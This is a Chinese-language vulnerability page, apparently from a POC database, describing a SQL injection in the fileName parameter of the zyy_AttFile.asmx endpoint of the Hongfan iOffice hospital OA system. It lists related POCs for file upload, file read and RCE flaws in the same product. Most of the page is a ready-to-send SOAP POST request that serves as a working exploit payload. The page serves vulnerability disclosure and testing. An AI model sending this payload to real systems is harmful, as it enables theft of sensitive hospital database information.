红帆 OA zyy_AttFile.asmx 文件 fileName 参数 SQL 注入漏洞

日期: 2023-06-30 | 影响软件: 红帆OA | POC: 已公开

漏洞描述

红帆OA是红帆科技基于微软.NET最新技术开发的信息管理平台,红帆oa系统为医院提供oA功能，完成信息发布、流程审批、公文管理、日程管理、工作安排、文件传递、在线沟通等行政办公业务。红帆协同办公系统是国内最专业、成功案例最多的医院OA。红帆iOffice医院版存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。

PoC代码

POST /iOffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
Host: 
Content-Type: text/xml
Content-Length: 388

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <GetFileAtt
            xmlns="http://tempuri.org/">
            <fileName>%</fileName>
        </GetFileAtt>
    </soap:Body>
</soap:Envelope>

漏洞描述

PoC代码

相关漏洞推荐

hongfan-oa-iorepsavexml-file-upload: 红帆OA iorepsavexml.aspx 任意文件上传 POC

ioffice-oa-iofileexport-read-file: 红帆OA ioFileExport.aspx 任意文件读取漏洞 POC

ioffice-oa-udfmr-asmx-sql-inject: 红帆OA udfmr.asmx SQL注入漏洞 POC

hongfan-oa-ioassistance-rce: 红帆OA ioAssistance.asmx 注入RCE POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC